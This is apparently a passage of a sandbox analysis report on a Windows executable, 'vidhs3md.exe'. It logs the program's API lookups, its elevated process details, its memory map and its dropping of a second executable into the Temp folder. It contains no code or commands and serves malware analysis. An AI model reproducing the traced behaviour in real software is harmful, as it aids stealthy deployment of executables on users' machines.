| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:31 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #136: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #136 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:56, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x93c |
| Parent PID | 0x2b8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
920
0x
C28
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x00610000 | 0x00639fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x008d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x01d2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x743b0000 | 0x74441fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
